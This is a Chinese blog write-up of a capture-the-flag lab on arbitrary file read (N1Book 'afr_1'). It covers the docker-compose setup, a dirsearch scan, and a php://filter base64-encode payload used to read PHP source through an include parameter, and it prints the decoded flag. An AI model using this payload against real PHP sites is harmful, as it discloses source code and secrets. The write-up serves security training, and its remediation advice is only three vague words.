【文件读取/包含】任意文件读取漏洞 afr_1

1.1漏洞描述

漏洞名称任意文件读取漏洞 afr_1
漏洞类型文件读取
漏洞等级
漏洞环境docker
攻击方式

1.2漏洞等级

高危

1.3影响版本

暂无

1.4漏洞复现

1.4.1.基础环境

靶场docker
工具BurpSuite

1.4.2.靶场搭建

        1.创建docker-compose.yml文件

version: '3.2'

services:
  web:
    image: registry.cn-hangzhou.aliyuncs.com/n1book/web-file-read-1:latest
    ports:
      - 80:80

        2.将该代码写入文件

启动方式

docker-compose up -d

flag

n1book{afr_1_solved}

关闭

sudo docker-compose down

        3.访问kali 80端口

        搭建成功 

1.5深度利用

1.5.1漏洞点

  • 1.dirsearch目录扫描

dirsearch --url http://10.9.47.79 

  • 2.查看 /flag.php

  • 3.查看/index.php

  • 发现跳转到 ?p=hello

所以可能是/index.html包含了?p=hello

文件包含

  • 4.使用php://fileter 读取(读取php源码)

?filepath=php://filter/read=convert.base64-encode/resource=[目标文件]

  • 它读取到的结果是base64加密的 

PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9

  • 5.进行base64解码

  • 6.成功拿到flag

n1book{afr_1_solved}

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

  • 升级

  • 打补丁

  • 上设备

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值